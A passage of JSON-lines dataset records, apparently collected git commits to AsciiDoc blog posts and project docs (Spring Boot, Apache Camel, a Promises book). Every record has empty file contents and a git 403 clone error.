2016-04-15-Ubiquitous-language-without-domain-driven-design.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-04-15-Ubiquitous-language-without-domain-driven-design.adoc","new_file":"_posts\/2016-04-15-Ubiquitous-language-without-domain-driven-design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6ac9a3624a4d9fcecdec18ee866d5f9680d8841","subject":"Update 2016-05-15-Hosting-static-documentation-with-Asciidoctor-and-GH-pages.adoc","message":"Update 2016-05-15-Hosting-static-documentation-with-Asciidoctor-and-GH-pages.adoc","repos":"gscheibel\/blog,gscheibel\/blog,gscheibel\/blog","old_file":"_posts\/2016-05-15-Hosting-static-documentation-with-Asciidoctor-and-GH-pages.adoc","new_file":"_posts\/2016-05-15-Hosting-static-documentation-with-Asciidoctor-and-GH-pages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gscheibel\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d5fc38b0c78dd4049b9c74b36968413bd24e2af7","subject":"Update 2016-07-03-Rights-and-Duties.adoc","message":"Update 2016-07-03-Rights-and-Duties.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b31c68103719c6294d9099486ba7e041a7f411eb","subject":"Update 2016-09-19-Complicated-flowcharts-Scottish-Rite-edition.adoc","message":"Update 2016-09-19-Complicated-flowcharts-Scottish-Rite-edition.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2016-09-19-Complicated-flowcharts-Scottish-Rite-edition.adoc","new_file":"_posts\/2016-09-19-Complicated-flowcharts-Scottish-Rite-edition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f106da3c8ae85f27c353a3c479894398d9e0267c","subject":"Publish 20161110-1232-showoff-zone-owo.adoc","message":"Publish 20161110-1232-showoff-zone-owo.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"20161110-1232-showoff-zone-owo.adoc","new_file":"20161110-1232-showoff-zone-owo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03da8eea1184806adcfc94f12a3890cf35c174e3","subject":"Added note about removal of camel-atmosphere-websocket Karaf feature","message":"Added note about removal of camel-atmosphere-websocket Karaf 
feature\n","repos":"adessaigne\/camel,alvinkwekel\/camel,apache\/camel,pmoerenhout\/camel,pmoerenhout\/camel,pax95\/camel,cunningt\/camel,nikhilvibhav\/camel,tdiesler\/camel,cunningt\/camel,alvinkwekel\/camel,nicolaferraro\/camel,pmoerenhout\/camel,nicolaferraro\/camel,gnodet\/camel,gnodet\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,adessaigne\/camel,adessaigne\/camel,apache\/camel,pax95\/camel,pax95\/camel,adessaigne\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,pax95\/camel,cunningt\/camel,apache\/camel,christophd\/camel,apache\/camel,christophd\/camel,adessaigne\/camel,christophd\/camel,tdiesler\/camel,tadayosi\/camel,tadayosi\/camel,adessaigne\/camel,gnodet\/camel,nicolaferraro\/camel,pmoerenhout\/camel,christophd\/camel,tdiesler\/camel,mcollovati\/camel,pmoerenhout\/camel,mcollovati\/camel,christophd\/camel,tadayosi\/camel,mcollovati\/camel,tadayosi\/camel,tadayosi\/camel,gnodet\/camel,cunningt\/camel,christophd\/camel,apache\/camel,tdiesler\/camel,gnodet\/camel,tdiesler\/camel,cunningt\/camel,tadayosi\/camel,pax95\/camel,tdiesler\/camel,nicolaferraro\/camel,cunningt\/camel,pax95\/camel,apache\/camel,mcollovati\/camel,nikhilvibhav\/camel","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-3x-upgrade-guide-3_6.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-3x-upgrade-guide-3_6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"784fd496f4ff9a5695559e1930bd84c38849c873","subject":"Update 2016-04-24-post-3-test.adoc","message":"Update 2016-04-24-post-3-test.adoc","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/2016-04-24-post-3-test.adoc","new_file":"_posts\/2016-04-24-post-3-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"269ae1eaec4a07db1deaa1930464127271af3b1d","subject":"Update 2016-08-10-Hello-World.adoc","message":"Update 2016-08-10-Hello-World.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-Hello-World.adoc","new_file":"_posts\/2016-08-10-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f53e6dabe13440123bb3c6af6924f1dfc5b8709","subject":"Update 2016-08-21-Chove-Chuva.adoc","message":"Update 2016-08-21-Chove-Chuva.adoc","repos":"bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io","old_file":"_posts\/2016-08-21-Chove-Chuva.adoc","new_file":"_posts\/2016-08-21-Chove-Chuva.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bretonio\/bretonio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c0ea3e4fce1afc394a03f4229bbc15efa2019ec","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 
2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e72435e4b659eba04f2021099c8298d11aa4ddb4","subject":"Update 2017-08-21-.adoc","message":"Update 2017-08-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-.adoc","new_file":"_posts\/2017-08-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5da1bb07aa6ad3d74fed5b78e6429162c5c6a6fa","subject":"Update 2017-10-27-.adoc","message":"Update 2017-10-27-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-27-.adoc","new_file":"_posts\/2017-10-27-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d39b774b2d859c52a6d9b240950efe22099ca6c","subject":"Update 2017-09-10-Avant-Quads-Xero-S5M-Review.adoc","message":"Update 2017-09-10-Avant-Quads-Xero-S5M-Review.adoc","repos":"OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io","old_file":"_posts\/2017-09-10-Avant-Quads-Xero-S5M-Review.adoc","new_file":"_posts\/2017-09-10-Avant-Quads-Xero-S5M-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OctavioMaia\/octaviomaia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3faf648361c8f49de1eb8e434a441e88f35ddc51","subject":"Update 2017-01-18-A-Fresh-Poem.adoc","message":"Update 2017-01-18-A-Fresh-Poem.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-01-18-A-Fresh-Poem.adoc","new_file":"_posts\/2017-01-18-A-Fresh-Poem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d914ac1ff2275ce2339e94ae2d41ca0c98bb7c36","subject":"re-added readme with instructions for git submodule of yajsw","message":"re-added readme with instructions for git submodule of yajsw\n","repos":"HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j","old_file":"tools\/README.asciidoc","new_file":"tools\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HuangLS\/neo4j.git\/': The requested URL 
returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"66173abd67f6089d0c90121af0e49fd0584ecc0d","subject":"Adding Docker readme file","message":"Adding Docker readme file\n","repos":"kpiwko\/arquillian-safari,kpiwko\/arquillian-safari","old_file":"arquillian-docker-scenario\/README.adoc","new_file":"arquillian-docker-scenario\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kpiwko\/arquillian-safari.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"96ca3e0c0f9c184397aede177638dd287d80b948","subject":"Polish","message":"Polish\n\nAdd missing documentation\n\nSee gh-4220\n","repos":"tiarebalbi\/spring-boot,tsachev\/spring-boot,izeye\/spring-boot,ameraljovic\/spring-boot,cleverjava\/jenkins2-course-spring-boot,yhj630520\/spring-boot,chrylis\/spring-boot,bclozel\/spring-boot,NetoDevel\/spring-boot,dreis2211\/spring-boot,donhuvy\/spring-boot,sbuettner\/spring-boot,michael-simons\/spring-boot,philwebb\/spring-boot-concourse,NetoDevel\/spring-boot,mbenson\/spring-boot,lucassaldanha\/spring-boot,felipeg48\/spring-boot,ollie314\/spring-boot,brettwooldridge\/spring-boot,felipeg48\/spring-boot,rweisleder\/spring-boot,brettwooldridge\/spring-boot,lenicliu\/spring-boot,hello2009chen\/spring-boot,tsachev\/spring-boot,mbogoevici\/spring-boot,javyzheng\/spring-boot,philwebb\/spring-boot,lucassaldanha\/spring-boot,spring-projects\/spring-boot,joansmith\/spring-boot,lucassaldanha\/spring-boot,lexandro\/spring-boot,jxblum\/spring-boot,xiaoleiPENG\/my-project,bbrouwer\/spring-boot,donhuvy\/spring-boot,htynkn\/spring-boot,kdvolder\/spring-boot,shakuzen\/spring-boot,michael-simons\/spring-boot,dfa1\/spring-boot,mdeinum\/spring-boot,xiaoleiPENG\/my-project,DeezCashews\/spring-boot,nebhale\/spring-boot,deki\/spring-boot,chrylis\/spring-boot,jayarampradhan\/spring-boot,habuma\/spring-boot,tsachev\/spring-boot,thomasdarimont\/spring-boot,zhanhb\/spring-boot,herau\/spring-boot,vakninr\/spring-boot,sebastiankirsch\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,dreis2211\/spring-boot,hello2009chen\/spring-boot,kdvolder\/spring-boot,i007422\/jenkins2-course-spring-boot,RichardCSantana\/spring-boot,aahlenst\/spring-boot,pvorb\/spring-boot,wilkinsona\/spring-boot,neo4j-contrib\/spring-boot,jayarampradhan\/spring-boot,spring-projects\/spring-boot,dfa1\/spring-boot,vakninr\/spring-boot,ilayaperumalg\/spring-boot,aahlenst\/spring-boot,felipeg48\/spring-boot,bbrouwer\/spring-boot,shakuzen\/spring-boot,joshthornhill\/spring-boot,izeye\/spring-boot,bbrouwer\/spring-boot,sbuettner\/spring-boot,ihoneymon\/spring-boot,mbenson\/spring-boot,pvorb\/spring-boot,dreis2211\/spring-boot,wilkinsona\/spring-boot,habuma\/spring-boot,bjornlindstrom\/spring-boot,isopov\/spring-boot,tiarebalbi\/spring-boot,i007422\/jenkins2-course-spring-boot,scottfrederick\/spring-boot,olivergierke\/spring-boot,sbcoba\/spring-boot,royclarkson\/spring-boot,joansmith\/spring-boot,cleverjava\/jenkins2-course-spring-boot,i007422\/jenkins2-course-spring-boot,SaravananParthasarathy\/SPSDemo,shangyi0102\/spring-boot,felipeg48\/spring-boot,jmnarloch\/spring-boot,javyzheng\/spring-boot,jbovet\/spring-boot,shakuzen\/spring-boot,rweisleder\/spring-boot,isopov\/spring-boot,pvorb\/spring-boot,philwebb\/spring-boot-concourse,ilayaperumalg\/spring-boot,ollie314\/spring-boot,javyzheng\/spring-boot,nebhale\/spring-boot,joansmith\/spring-boot,mbenson\/spring-boot,candrews\/spring-boot,ihoneymon\/spring-boot,hqrt\/jenkins2-cou
rse-spring-boot,SaravananParthasarathy\/SPSDemo,minmay\/spring-boot,joansmith\/spring-boot,joansmith\/spring-boot,RichardCSantana\/spring-boot,vpavic\/spring-boot,htynkn\/spring-boot,sbuettner\/spring-boot,lenicliu\/spring-boot,habuma\/spring-boot,dfa1\/spring-boot,minmay\/spring-boot,joshiste\/spring-boot,yhj630520\/spring-boot,spring-projects\/spring-boot,linead\/spring-boot,Buzzardo\/spring-boot,RichardCSantana\/spring-boot,mosoft521\/spring-boot,dreis2211\/spring-boot,isopov\/spring-boot,lenicliu\/spring-boot,i007422\/jenkins2-course-spring-boot,yhj630520\/spring-boot,jayarampradhan\/spring-boot,jxblum\/spring-boot,isopov\/spring-boot,felipeg48\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,philwebb\/spring-boot,NetoDevel\/spring-boot,sebastiankirsch\/spring-boot,jmnarloch\/spring-boot,pvorb\/spring-boot,hqrt\/jenkins2-course-spring-boot,minmay\/spring-boot,dreis2211\/spring-boot,candrews\/spring-boot,lburgazzoli\/spring-boot,linead\/spring-boot,shakuzen\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,shakuzen\/spring-boot,lexandro\/spring-boot,wilkinsona\/spring-boot,drumonii\/spring-boot,mrumpf\/spring-boot,drumonii\/spring-boot,vakninr\/spring-boot,dfa1\/spring-boot,cleverjava\/jenkins2-course-spring-boot,drumonii\/spring-boot,ilayaperumalg\/spring-boot,jvz\/spring-boot,afroje-reshma\/spring-boot-sample,vpavic\/spring-boot,htynkn\/spring-boot,vpavic\/spring-boot,wilkinsona\/spring-boot,ihoneymon\/spring-boot,neo4j-contrib\/spring-boot,vakninr\/spring-boot,hello2009chen\/spring-boot,olivergierke\/spring-boot,brettwooldridge\/spring-boot,shangyi0102\/spring-boot,xiaoleiPENG\/my-project,mbogoevici\/spring-boot,DeezCashews\/spring-boot,rweisleder\/spring-boot,chrylis\/spring-boot,Buzzardo\/spring-boot,htynkn\/spring-boot,aahlenst\/spring-boot,hqrt\/jenkins2-course-spring-boot,zhangshuangquan\/spring-root,aahlenst\/spring-boot,ilayaperumalg\/spring-boot,izeye\/spring-boot,sbcoba\/spring-boot,jbovet\/spring-boot,zhanhb\/spring-boot,kdvolder\/spring-boot,zhangshuangquan\/spring-root,jbovet\/spring-boot,mdeinum\/spring-boot,lburgazzoli\/spring-boot,sebastiankirsch\/spring-boot,akmaharshi\/jenkins,mdeinum\/spring-boot,bjornlindstrom\/spring-boot,NetoDevel\/spring-boot,DeezCashews\/spring-boot,michael-simons\/spring-boot,bijukunjummen\/spring-boot,javyzheng\/spring-boot,ihoneymon\/spring-boot,pvorb\/spring-boot,spring-projects\/spring-boot,akmaharshi\/jenkins,nebhale\/spring-boot,shangyi0102\/spring-boot,sbcoba\/spring-boot,akmaharshi\/jenkins,dfa1\/spring-boot,javyzheng\/spring-boot,mosoft521\/spring-boot,yangdd1205\/spring-boot,kdvolder\/spring-boot,zhanhb\/spring-boot,bijukunjummen\/spring-boot,ameraljovic\/spring-boot,hello2009chen\/spring-boot,kamilszymanski\/spring-boot,afroje-reshma\/spring-boot-sample,jvz\/spring-boot,ptahchiev\/spring-boot,ptahchiev\/spring-boot,eddumelendez\/spring-boot,xiaoleiPENG\/my-project,jxblum\/spring-boot,mrumpf\/spring-boot,royclarkson\/spring-boot,deki\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,vakninr\/spring-boot,donhuvy\/spring-boot,i007422\/jenkins2-course-spring-boot,mbogoevici\/spring-boot,vpavic\/spring-boot,bijukunjummen\/spring-boot,akmaharshi\/jenkins,michael-simons\/spring-boot,candrews\/spring-boot,philwebb\/spring-boot-concourse,eddumelendez\/spring-boot,bclozel\/spring-boot,neo4j-contrib\/spring-boot,jxblum\/spring-boot,mrumpf\/spring-boot,philwebb\/spring-boot-concourse,bclozel\/spring-boot,SaravananParthasarathy\/SPSDemo,bclozel\/spring-boot,habuma\/spring-boot,bbrouwer\/spring-boot,bjornlindstrom\/spring-boot,mbenson\
/spring-boot,ameraljovic\/spring-boot,vpavic\/spring-boot,minmay\/spring-boot,jayarampradhan\/spring-boot,lucassaldanha\/spring-boot,cleverjava\/jenkins2-course-spring-boot,shangyi0102\/spring-boot,Nowheresly\/spring-boot,candrews\/spring-boot,eddumelendez\/spring-boot,lburgazzoli\/spring-boot,thomasdarimont\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,philwebb\/spring-boot,drumonii\/spring-boot,bijukunjummen\/spring-boot,jvz\/spring-boot,afroje-reshma\/spring-boot-sample,ollie314\/spring-boot,ameraljovic\/spring-boot,kdvolder\/spring-boot,bbrouwer\/spring-boot,isopov\/spring-boot,neo4j-contrib\/spring-boot,zhanhb\/spring-boot,wilkinsona\/spring-boot,mbenson\/spring-boot,thomasdarimont\/spring-boot,sbcoba\/spring-boot,joshthornhill\/spring-boot,bjornlindstrom\/spring-boot,hqrt\/jenkins2-course-spring-boot,mosoft521\/spring-boot,jxblum\/spring-boot,nebhale\/spring-boot,lenicliu\/spring-boot,lexandro\/spring-boot,htynkn\/spring-boot,donhuvy\/spring-boot,bclozel\/spring-boot,mbogoevici\/spring-boot,sebastiankirsch\/spring-boot,yangdd1205\/spring-boot,lexandro\/spring-boot,herau\/spring-boot,philwebb\/spring-boot,vpavic\/spring-boot,jmnarloch\/spring-boot,scottfrederick\/spring-boot,SaravananParthasarathy\/SPSDemo,SaravananParthasarathy\/SPSDemo,nebhale\/spring-boot,jxblum\/spring-boot,jmnarloch\/spring-boot,ptahchiev\/spring-boot,ptahchiev\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,NetoDevel\/spring-boot,joshiste\/spring-boot,DeezCashews\/spring-boot,tsachev\/spring-boot,zhanhb\/spring-boot,candrews\/spring-boot,jayarampradhan\/spring-boot,herau\/spring-boot,mrumpf\/spring-boot,ollie314\/spring-boot,eddumelendez\/spring-boot,qerub\/spring-boot,qerub\/spring-boot,habuma\/spring-boot,izeye\/spring-boot,qerub\/spring-boot,linead\/spring-boot,zhangshuangquan\/spring-root,yangdd1205\/spring-boot,Buzzardo\/spring-boot,herau\/spring-boot,donhuvy\/spring-boot,bjornlindstrom\/spring-boot,sebastiankirsch\/spring-boot,ptahchiev\/spring-boot,tiarebalbi\/spring-boot,mosoft521\/spring-boot,herau\/spring-boot,royclarkson\/spring-boot,ptahchiev\/spring-boot,afroje-reshma\/spring-boot-sample,ameraljovic\/spring-boot,mdeinum\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,minmay\/spring-boot,aahlenst\/spring-boot,thomasdarimont\/spring-boot,ilayaperumalg\/spring-boot,michael-simons\/spring-boot,kamilszymanski\/spring-boot,mbenson\/spring-boot,bclozel\/spring-boot,joshthornhill\/spring-boot,Buzzardo\/spring-boot,linead\/spring-boot,wilkinsona\/spring-boot,yhj630520\/spring-boot,lenicliu\/spring-boot,rweisleder\/spring-boot,michael-simons\/spring-boot,olivergierke\/spring-boot,dreis2211\/spring-boot,ilayaperumalg\/spring-boot,scottfrederick\/spring-boot,chrylis\/spring-boot,aahlenst\/spring-boot,deki\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,mdeinum\/spring-boot,lexandro\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,rajendra-chola\/jenkins2-course-spring-boot,jmnarloch\/spring-boot,spring-projects\/spring-boot,Buzzardo\/spring-boot,jbovet\/spring-boot,izeye\/spring-boot,zhanhb\/spring-boot,scottfrederick\/spring-boot,tsachev\/spring-boot,deki\/spring-boot,qerub\/spring-boot,hello2009chen\/spring-boot,mbogoevici\/spring-boot,isopov\/spring-boot,mrumpf\/spring-boot,mdeinum\/spring-boot,philwebb\/spring-boot-concourse,thomasdarimont\/spring-boot,brettwooldridge\/spring-boot,qerub\/spring-boot,Nowheresly\/spring-boot,royclarkson\/spring-boot,olivergierke\/spring-boot,afroje-reshma\/spring-boot-sample,habuma\/spring-boot,drumonii\/spring-boot,eddumelendez\/spring-boot
,jbovet\/spring-boot,brettwooldridge\/spring-boot,joshthornhill\/spring-boot,drumonii\/spring-boot,mosoft521\/spring-boot,Buzzardo\/spring-boot,ihoneymon\/spring-boot,shangyi0102\/spring-boot,joshiste\/spring-boot,joshiste\/spring-boot,xiaoleiPENG\/my-project,joshiste\/spring-boot,DeezCashews\/spring-boot,shakuzen\/spring-boot,RichardCSantana\/spring-boot,zhangshuangquan\/spring-root,bijukunjummen\/spring-boot,joshthornhill\/spring-boot,kamilszymanski\/spring-boot,deki\/spring-boot,sbcoba\/spring-boot,yhj630520\/spring-boot,spring-projects\/spring-boot,tiarebalbi\/spring-boot,cleverjava\/jenkins2-course-spring-boot,kdvolder\/spring-boot,lburgazzoli\/spring-boot,lburgazzoli\/spring-boot,chrylis\/spring-boot,lucassaldanha\/spring-boot,Nowheresly\/spring-boot,Nowheresly\/spring-boot,kamilszymanski\/spring-boot,eddumelendez\/spring-boot,linead\/spring-boot,donhuvy\/spring-boot,htynkn\/spring-boot,philwebb\/spring-boot,rweisleder\/spring-boot,chrylis\/spring-boot,RichardCSantana\/spring-boot,rweisleder\/spring-boot,scottfrederick\/spring-boot,philwebb\/spring-boot,hqrt\/jenkins2-course-spring-boot,scottfrederick\/spring-boot,ihoneymon\/spring-boot,Nowheresly\/spring-boot,ollie314\/spring-boot,neo4j-contrib\/spring-boot,royclarkson\/spring-boot,jvz\/spring-boot,felipeg48\/spring-boot,kamilszymanski\/spring-boot,joshiste\/spring-boot,tsachev\/spring-boot,tiarebalbi\/spring-boot,zhangshuangquan\/spring-root,sbuettner\/spring-boot,olivergierke\/spring-boot,sbuettner\/spring-boot,akmaharshi\/jenkins,jvz\/spring-boot,tiarebalbi\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/appendix-application-properties.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/appendix-application-properties.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"193f20d61151dd9709be57ee757c652527b654af","subject":"Update 2017-01-27-Chronicle-Queue-storing-1-TB-in-virtual-memory-on-a-128-GB-machine.adoc","message":"Update 2017-01-27-Chronicle-Queue-storing-1-TB-in-virtual-memory-on-a-128-GB-machine.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2017-01-27-Chronicle-Queue-storing-1-TB-in-virtual-memory-on-a-128-GB-machine.adoc","new_file":"_posts\/2017-01-27-Chronicle-Queue-storing-1-TB-in-virtual-memory-on-a-128-GB-machine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"150a649461b43ada7f738c0c8a1046d777ca46a4","subject":"Add psql cheatsheet","message":"Add psql cheatsheet\n","repos":"Stratus3D\/dotfiles,Stratus3D\/dotfiles,Stratus3D\/dotfiles","old_file":"guides\/psql_cheatsheet.adoc","new_file":"guides\/psql_cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Stratus3D\/dotfiles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3cd6efeaf6d40c065da6f338988e44dd74771dec","subject":"Update 2016-06-28-title-avout-a-thing.adoc","message":"Update 
2016-06-28-title-avout-a-thing.adoc","repos":"iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io","old_file":"_posts\/2016-06-28-title-avout-a-thing.adoc","new_file":"_posts\/2016-06-28-title-avout-a-thing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iveskins\/iveskins.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14cc217e6c3bc58e44f7d1aa2a98dac4a7bb6291","subject":"added instance groups; issue #57","message":"added instance groups; issue #57\n","repos":"dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop","old_file":"instance-groups\/readme.adoc","new_file":"instance-groups\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dalbhanj\/kubernetes-aws-workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ea8ca5d6f38ae8fde5d9f1b4e4b7521c1b261e63","subject":"write(column-promise-resolve): \u975e\u540c\u671f\u3067\u5b9f\u884c\u3055\u308c\u3066\u3044\u308b\u30b3\u30fc\u30c9\u306e\u89e3\u8aac\u3092\u8ffd\u52a0","message":"write(column-promise-resolve): \u975e\u540c\u671f\u3067\u5b9f\u884c\u3055\u308c\u3066\u3044\u308b\u30b3\u30fc\u30c9\u306e\u89e3\u8aac\u3092\u8ffd\u52a0\n\n\u3042\u304f\u307e\u3067\u975e\u540c\u671f\u3067\u5b9f\u884c\u3055\u308c\u308b\u306e\u306fPromise\u306e\u4ed5\u69d8\u306b\u3088\u308b\u3082\u306e\n\n\u3000\nresolve #167\n","repos":"charlenopires\/promises-book,tangjinzhou\/promises-book,cqricky\/promises-book,wenber\/promises-book,wangwei1237\/promises-book,xifeiwu\/promises-book,purepennons\/promises-book,mzbac\/promises-book,oToUC\/promises-book,liubin\/promises-book,azu\/promises-book,genie88\/promises-book,oToUC\/promises-book,lidasong2014\/promises-book,tangjinzhou\/promises-book,liyunsheng\/promises-book,wenber\/promises-book,dieface\/promises-book,liubin\/promises-book,sunfurong\/promise,liubin\/promises-book,tangjinzhou\/promises-book,dieface\/promises-book,xifeiwu\/promises-book,mzbac\/promises-book,oToUC\/promises-book,azu\/promises-book,wangwei1237\/promises-book,purepennons\/promises-book,azu\/promises-book,cqricky\/promises-book,azu\/promises-book,liyunsheng\/promises-book,wangwei1237\/promises-book,genie88\/promises-book,wenber\/promises-book,charlenopires\/promises-book,dieface\/promises-book,xifeiwu\/promises-book,mzbac\/promises-book,sunfurong\/promise,cqricky\/promises-book,charlenopires\/promises-book,lidasong2014\/promises-book,lidasong2014\/promises-book,purepennons\/promises-book,sunfurong\/promise,liyunsheng\/promises-book,genie88\/promises-book","old_file":"Ch2_HowToWrite\/column-promise-resolve.adoc","new_file":"Ch2_HowToWrite\/column-promise-resolve.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"793398e8d824ae9877326c090870edbd5bb34328","subject":"chore(notification-thenable): \u6bb5\u843d\u3092\u4fee\u6b63","message":"chore(notification-thenable): 
